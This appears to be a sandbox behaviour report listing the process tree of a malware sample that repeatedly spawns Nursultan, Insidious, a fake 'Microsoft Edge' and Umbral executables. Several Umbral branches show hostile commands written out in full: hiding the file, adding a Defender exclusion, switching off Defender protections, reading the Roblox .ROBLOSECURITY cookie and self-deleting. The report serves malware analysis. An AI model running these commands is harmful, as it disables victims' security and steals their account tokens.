C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
32⤵
PID:3436

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
33⤵
PID:5532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
34⤵
PID:5300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
35⤵
PID:5808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
36⤵
PID:3088

C:\Windows\system32\cmd.exe
cmd
36⤵
PID:5872

C:\Windows\system32\chcp.com
chcp 65001
35⤵
PID:5904

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
35⤵
- Delays execution with timeout.exe
PID:2544

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
35⤵
PID:5828

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
34⤵
- Checks processor information in registry
PID:3108

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
34⤵
PID:2144

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
34⤵
PID:6012

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
33⤵
PID:2428

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
34⤵
- Checks computer location settings
PID:3896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
35⤵
PID:5784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
36⤵
PID:5808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
37⤵
PID:5000

C:\Windows\system32\cmd.exe
cmd
37⤵
PID:2108

C:\Windows\system32\chcp.com
chcp 65001
36⤵
PID:3448

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
36⤵
- Delays execution with timeout.exe
PID:432

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
36⤵
PID:5000

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
35⤵
PID:5168

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
35⤵
PID:2428

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
35⤵
PID:5240

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
34⤵
- Checks computer location settings
PID:5036

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
35⤵
PID:1992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
36⤵
PID:2308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
37⤵
PID:3632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
38⤵
PID:1088

C:\Windows\system32\cmd.exe
cmd
38⤵
PID:5304

C:\Windows\system32\chcp.com
chcp 65001
37⤵
PID:792

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
37⤵
- Delays execution with timeout.exe
PID:5168

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
37⤵
PID:3520

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
36⤵
PID:2636

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
36⤵
PID:5380

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
36⤵
PID:4580

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
35⤵
PID:3964

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
36⤵
PID:3428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
37⤵
PID:5492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
38⤵
PID:3896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
39⤵
PID:620

C:\Windows\system32\cmd.exe
cmd
39⤵
PID:4900

C:\Windows\system32\chcp.com
chcp 65001
38⤵
PID:1764

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
38⤵
- Delays execution with timeout.exe
PID:2976

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
38⤵
PID:4580

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
37⤵
PID:2912

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
37⤵
PID:6100

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
37⤵
PID:2144

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
36⤵
- Checks computer location settings
PID:4548

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
37⤵
PID:5760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
38⤵
PID:5256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
39⤵
PID:1756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
40⤵
PID:5044

C:\Windows\system32\cmd.exe
cmd
40⤵
PID:6032

C:\Windows\system32\chcp.com
chcp 65001
39⤵
PID:2236

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
39⤵
- Delays execution with timeout.exe
PID:6132

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
39⤵
PID:4448

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
38⤵
PID:5768

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
38⤵
PID:3064

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
38⤵
PID:792

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
37⤵
- Checks computer location settings
PID:4564

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
38⤵
PID:4752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
39⤵
PID:3220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
40⤵
PID:3436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
41⤵
PID:2268

C:\Windows\system32\cmd.exe
cmd
41⤵
PID:3584

C:\Windows\system32\chcp.com
chcp 65001
40⤵
PID:5552

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
40⤵
- Delays execution with timeout.exe
PID:3164

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
40⤵
PID:2636

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
39⤵
PID:4064

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
39⤵
PID:1312

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
39⤵
PID:5732

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
38⤵
- Checks computer location settings
PID:4652

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
39⤵
- Checks computer location settings
PID:5840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
40⤵
PID:5892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
41⤵
PID:5760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
42⤵
PID:540

C:\Windows\system32\cmd.exe
cmd
42⤵
PID:2536

C:\Windows\system32\chcp.com
chcp 65001
41⤵
PID:792

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
41⤵
- Delays execution with timeout.exe
PID:6108

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
41⤵
PID:4952

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
40⤵
PID:4000

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
40⤵
PID:2084

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
40⤵
PID:4516

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
39⤵
- Checks computer location settings
PID:4132

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
40⤵
PID:5344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
41⤵
PID:5828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
42⤵
PID:3496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
43⤵
PID:820

C:\Windows\system32\cmd.exe
cmd
43⤵
PID:5244

C:\Windows\system32\chcp.com
chcp 65001
42⤵
PID:3020

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
42⤵
- Delays execution with timeout.exe
PID:5632

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
42⤵
PID:5876

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
41⤵
- Checks processor information in registry
PID:2268

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
41⤵
PID:3436

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
41⤵
PID:2536

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
40⤵
- Checks computer location settings
PID:4140

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
41⤵
- Checks computer location settings
PID:2912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
42⤵
PID:1664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
43⤵
PID:5808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
44⤵
PID:5940

C:\Windows\system32\cmd.exe
cmd
44⤵
PID:2636

C:\Windows\system32\chcp.com
chcp 65001
43⤵
PID:4932

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
43⤵
- Delays execution with timeout.exe
PID:2044

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
43⤵
PID:5740

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
42⤵
PID:2464

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
42⤵
PID:5076

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
42⤵
PID:4880

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
41⤵
PID:3884

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
42⤵
- Checks computer location settings
PID:4648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
43⤵
PID:5768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
44⤵
PID:3204

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
45⤵
PID:2180

C:\Windows\system32\cmd.exe
cmd
45⤵
PID:1072

C:\Windows\system32\chcp.com
chcp 65001
44⤵
PID:6016

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
44⤵
- Delays execution with timeout.exe
PID:6056

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
44⤵
PID:2396

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
43⤵
- Checks processor information in registry
PID:6104

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
43⤵
PID:3792

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
43⤵
PID:4000

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
42⤵
- Checks computer location settings
PID:1756

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
43⤵
- Checks computer location settings
PID:528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
44⤵
PID:3020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
45⤵
PID:5652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
46⤵
PID:5708

C:\Windows\system32\cmd.exe
cmd
46⤵
PID:1080

C:\Windows\system32\chcp.com
chcp 65001
45⤵
PID:4968

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
45⤵
- Delays execution with timeout.exe
PID:2268

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
45⤵
PID:5876

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
44⤵
PID:5848

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
44⤵
PID:4612

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
44⤵
PID:1092

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
43⤵
PID:4960

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
44⤵
- Checks computer location settings
PID:4180

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
45⤵
PID:1120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
46⤵
PID:5836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
47⤵
PID:4660

C:\Windows\system32\cmd.exe
cmd
47⤵
PID:2936

C:\Windows\system32\chcp.com
chcp 65001
46⤵
PID:5688

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
46⤵
- Delays execution with timeout.exe
PID:5180

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
46⤵
PID:6596

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
45⤵
PID:4448

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
45⤵
PID:5436

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
45⤵
- Drops file in Drivers directory
PID:2304

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
46⤵
PID:468

C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
46⤵
- Views/modifies file attributes
PID:2296

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
46⤵
- Command and Scripting Interpreter: PowerShell
PID:1092

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
46⤵
- Command and Scripting Interpreter: PowerShell
PID:4612

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
46⤵
- Command and Scripting Interpreter: PowerShell
PID:4112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
46⤵
PID:6440

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
46⤵
PID:6792

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
46⤵
PID:6976

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
46⤵
PID:7076

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
46⤵
- Command and Scripting Interpreter: PowerShell
PID:7140

C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
46⤵
- Detects videocard installed
PID:5572

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
46⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6700

C:\Windows\system32\PING.EXE
ping localhost
47⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6672

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
44⤵
- Checks computer location settings
PID:4620

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
45⤵
- Checks computer location settings
PID:220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
46⤵
PID:5748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
47⤵
PID:4900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
48⤵
PID:3584

C:\Windows\system32\cmd.exe
cmd
48⤵
PID:5560

C:\Windows\system32\chcp.com
chcp 65001
47⤵
PID:5708

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
47⤵
- Delays execution with timeout.exe
PID:5172

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
47⤵
PID:5884

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
46⤵
PID:3720

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
46⤵
PID:5744

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
46⤵
PID:544

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
45⤵
- Checks computer location settings
PID:4536

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
46⤵
- Checks computer location settings
PID:3424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
47⤵
PID:6688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
48⤵
PID:6888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
49⤵
PID:6904

C:\Windows\system32\cmd.exe
cmd
49⤵
PID:6912

C:\Windows\system32\chcp.com
chcp 65001
48⤵
PID:7004

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
48⤵
- Delays execution with timeout.exe
PID:7056

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
48⤵
PID:2844

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
47⤵
PID:6716

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
47⤵
PID:6768

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
47⤵
PID:6944

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
46⤵
PID:4400

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
47⤵
- Checks computer location settings
PID:6736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
48⤵
PID:5448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
49⤵
PID:6344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
50⤵
PID:6376

C:\Windows\system32\cmd.exe
cmd
50⤵
PID:6384

C:\Windows\system32\chcp.com
chcp 65001
49⤵
PID:6408

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
49⤵
- Delays execution with timeout.exe
PID:6436

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
49⤵
PID:1968

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
48⤵
- Checks processor information in registry
PID:5560

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
48⤵
PID:5728

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
48⤵
PID:6424

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
47⤵
- Checks computer location settings
PID:6776

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
48⤵
- Checks computer location settings
PID:3524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
49⤵
PID:6220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
50⤵
PID:6012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
51⤵
PID:7076

C:\Windows\system32\cmd.exe
cmd
51⤵
PID:7140

C:\Windows\system32\chcp.com
chcp 65001
50⤵
PID:5304

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
50⤵
- Delays execution with timeout.exe
PID:3976

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
50⤵
PID:6836

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
49⤵
PID:6044

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
49⤵
PID:1468

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
49⤵
PID:208

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
48⤵
- Checks computer location settings
PID:5936

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
49⤵
PID:6244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
50⤵
PID:1600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
51⤵
PID:3048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
52⤵
PID:6620

C:\Windows\system32\cmd.exe
cmd
52⤵
PID:6616

C:\Windows\system32\chcp.com
chcp 65001
51⤵
PID:6548

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
51⤵
- Delays execution with timeout.exe
PID:6488

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
51⤵
PID:7156

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
50⤵
- Checks processor information in registry
PID:2704

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
50⤵
PID:6788

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
50⤵
PID:6480

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
49⤵
PID:5856

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
50⤵
- Checks computer location settings
PID:1900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
51⤵
PID:5620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
52⤵
PID:6928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
53⤵
PID:6948

C:\Windows\system32\cmd.exe
cmd
53⤵
PID:6964

C:\Windows\system32\chcp.com
chcp 65001
52⤵
PID:6896

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
52⤵
- Delays execution with timeout.exe
PID:6996

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
52⤵
PID:6920

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
51⤵
PID:6936

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
51⤵
PID:6868

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
51⤵
- Drops file in Drivers directory
PID:7008

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
52⤵
PID:1392

C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
52⤵
- Views/modifies file attributes
PID:6372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
52⤵
- Command and Scripting Interpreter: PowerShell
PID:544

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
